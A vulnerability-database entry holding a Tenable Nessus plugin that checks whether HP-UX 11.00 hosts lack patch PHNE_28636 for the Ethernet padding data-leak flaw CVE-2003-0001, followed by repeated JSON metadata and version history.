ID HPUX_PHNE_28636.NASL Type nessus Reporter Tenable Modified 2013-04-20T00:00:00
Description
s700_800 11.00 EISA 100BT cumulative patch :
Potential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and patch checks in this plugin were
# extracted from HP patch PHNE_28636. The text itself is
# copyright (C) Hewlett-Packard Development Company, L.P.
#
include("compat.inc");
if (description)
{
script_id(17417);
script_version("$Revision: 1.13 $");
script_cvs_date("$Date: 2013/04/20 00:36:48 $");
script_cve_id("CVE-2003-0001");
script_xref(name:"CERT", value:"412115");
script_xref(name:"HP", value:"HPSBUX0305");
script_xref(name:"HP", value:"SSRT3451");
script_name(english:"HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)");
script_summary(english:"Checks for the patch in the swlist output");
script_set_attribute(
attribute:"synopsis",
value:"The remote HP-UX host is missing a security-related patch."
);
script_set_attribute(
attribute:"description",
value:
"s700_800 11.00 EISA 100BT cumulative patch :
Potential for Ethernet device drivers to reuse packet data for
padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001."
);
script_set_attribute(
attribute:"solution",
value:"Install patch PHNE_28636 or subsequent."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"cpe:/o:hp:hp-ux");
script_set_attribute(attribute:"patch_publication_date", value:"2003/07/08");
script_set_attribute(attribute:"plugin_publication_date", value:"2005/03/18");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.");
script_family(english:"HP-UX Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/HP-UX/version", "Host/HP-UX/swlist");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("hpux.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/HP-UX/version")) audit(AUDIT_OS_NOT, "HP-UX");
if (!get_kb_item("Host/HP-UX/swlist")) audit(AUDIT_PACKAGE_LIST_MISSING);
if (!hpux_check_ctx(ctx:"11.00"))
{
exit(0, "The host is not affected since PHNE_28636 applies to a different OS release.");
}
patches = make_list("PHNE_28636");
foreach patch (patches)
{
if (hpux_installed(app:patch))
{
exit(0, "The host is not affected because patch "+patch+" is installed.");
}
}
flag = 0;
if (hpux_check_patch(app:"100BT-EISA-FMT.100BT-FORMAT", version:"B.11.00.01")) flag++;
if (hpux_check_patch(app:"100BT-EISA-FMT.100BT-FORMAT", version:"B.11.00.02")) flag++;
if (hpux_check_patch(app:"100BT-EISA-FMT.100BT-FORMAT", version:"B.11.00.03")) flag++;
if (hpux_check_patch(app:"100BT-EISA-FMT.100BT-FORMAT", version:"B.11.00.04")) flag++;
if (hpux_check_patch(app:"100BT-EISA-KRN.100BT-KRN", version:"B.11.00.01")) flag++;
if (hpux_check_patch(app:"100BT-EISA-KRN.100BT-KRN", version:"B.11.00.02")) flag++;
if (hpux_check_patch(app:"100BT-EISA-KRN.100BT-KRN", version:"B.11.00.03")) flag++;
if (hpux_check_patch(app:"100BT-EISA-KRN.100BT-KRN", version:"B.11.00.04")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-INIT", version:"B.11.00.01")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-INIT", version:"B.11.00.02")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-INIT", version:"B.11.00.03")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-INIT", version:"B.11.00.04")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-RUN", version:"B.11.00.01")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-RUN", version:"B.11.00.02")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-RUN", version:"B.11.00.03")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-RUN", version:"B.11.00.04")) flag++;
if (flag)
{
if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());
else security_warning(0);
exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
{"id": "HPUX_PHNE_28636.NASL", "bulletinFamily": "scanner", "title": "HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "description": "s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "published": "2005-03-18T00:00:00", "modified": "2013-04-20T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=17417", "reporter": "Tenable", "references": [], "cvelist": ["CVE-2003-0001"], "type": "nessus", "lastseen": "2018-09-01T23:47:56", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:hp:hp-ux"], "cvelist": ["CVE-2003-0001"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "83c0128f729f72a5f55f37c6d66bf4e1a6eb2f985ba5fc31624412e4e09a4fbf", "hashmap": [{"hash": "e1777e6c2e94ff29d63dc0883d740876", "key": "cvelist"}, {"hash": "634d1af54c551c354e3204db0cbbc77a", "key": "modified"}, {"hash": "f537a8c4c2a2ecce05af223984a006fc", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8a41d28221c79eca7074f51fc96b542d", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7bcab4942f4f7e074eb4f7b4ecdf4f61", "key": "pluginID"}, {"hash": "afe57d0304e958202be29619fb28e901", "key": "cpe"}, {"hash": "2c90988f12d0f55d79edd4070999e39d", "key": "published"}, {"hash": "895f2a7b18396afc127ce655b15f4750", "key": "title"}, {"hash": "818c6bb883cdd9080fba437c46f3f9d3", "key": "description"}, {"hash": "a792e2393dff1e200b885c5245988f6f", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "220d862610286795a31951b35a56c058", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=17417", "id": "HPUX_PHNE_28636.NASL", "lastseen": "2017-10-29T13:38:34", "modified": "2013-04-20T00:00:00", "naslFamily": "HP-UX Local Security Checks", "objectVersion": "1.3", "pluginID": "17417", "published": "2005-03-18T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_28636. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17417);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_28636 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_28636 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_28636\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-10-29T13:38:34"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:hp:hp-ux"], "cvelist": ["CVE-2003-0001"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "edition": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "ed897d6d5e82e68850f26fc3f110b86d668697969e18d9b27302532f20fe77f8", "hashmap": [{"hash": "e1777e6c2e94ff29d63dc0883d740876", "key": "cvelist"}, {"hash": "634d1af54c551c354e3204db0cbbc77a", "key": "modified"}, {"hash": "f537a8c4c2a2ecce05af223984a006fc", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8a41d28221c79eca7074f51fc96b542d", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7bcab4942f4f7e074eb4f7b4ecdf4f61", "key": "pluginID"}, {"hash": "afe57d0304e958202be29619fb28e901", "key": "cpe"}, {"hash": "2c90988f12d0f55d79edd4070999e39d", "key": "published"}, {"hash": "895f2a7b18396afc127ce655b15f4750", "key": "title"}, {"hash": "818c6bb883cdd9080fba437c46f3f9d3", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "220d862610286795a31951b35a56c058", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=17417", "id": "HPUX_PHNE_28636.NASL", "lastseen": "2018-08-30T19:41:41", "modified": "2013-04-20T00:00:00", "naslFamily": "HP-UX Local Security Checks", "objectVersion": "1.3", "pluginID": "17417", "published": "2005-03-18T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_28636. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17417);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_28636 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_28636 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_28636\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:41:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2003-0001"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "edition": 1, "enchantments": {}, "hash": "aac65526c82af409a15fe1cff5e252c8881a71a4dbe9f85814032541b26a3d5c", "hashmap": [{"hash": "e1777e6c2e94ff29d63dc0883d740876", "key": "cvelist"}, {"hash": "634d1af54c551c354e3204db0cbbc77a", "key": "modified"}, {"hash": "f537a8c4c2a2ecce05af223984a006fc", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8a41d28221c79eca7074f51fc96b542d", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7bcab4942f4f7e074eb4f7b4ecdf4f61", "key": "pluginID"}, {"hash": "2c90988f12d0f55d79edd4070999e39d", "key": "published"}, {"hash": "895f2a7b18396afc127ce655b15f4750", "key": "title"}, {"hash": "818c6bb883cdd9080fba437c46f3f9d3", "key": "description"}, {"hash": "a792e2393dff1e200b885c5245988f6f", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "220d862610286795a31951b35a56c058", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=17417", "id": "HPUX_PHNE_28636.NASL", "lastseen": "2016-09-26T17:24:44", "modified": "2013-04-20T00:00:00", "naslFamily": "HP-UX Local Security Checks", "objectVersion": "1.2", "pluginID": "17417", "published": "2005-03-18T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_28636. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17417);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_28636 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_28636 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_28636\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "type": "nessus", "viewCount": 2}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:24:44"}], "edition": 4, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "afe57d0304e958202be29619fb28e901"}, {"key": "cvelist", "hash": "e1777e6c2e94ff29d63dc0883d740876"}, {"key": "cvss", "hash": "a792e2393dff1e200b885c5245988f6f"}, {"key": "description", "hash": "818c6bb883cdd9080fba437c46f3f9d3"}, {"key": "href", "hash": "8a41d28221c79eca7074f51fc96b542d"}, {"key": "modified", "hash": "634d1af54c551c354e3204db0cbbc77a"}, {"key": "naslFamily", "hash": "f537a8c4c2a2ecce05af223984a006fc"}, {"key": "pluginID", "hash": "7bcab4942f4f7e074eb4f7b4ecdf4f61"}, {"key": "published", "hash": "2c90988f12d0f55d79edd4070999e39d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "220d862610286795a31951b35a56c058"}, {"key": "title", "hash": "895f2a7b18396afc127ce655b15f4750"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "83c0128f729f72a5f55f37c6d66bf4e1a6eb2f985ba5fc31624412e4e09a4fbf", "viewCount": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_28636. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17417);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_28636 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 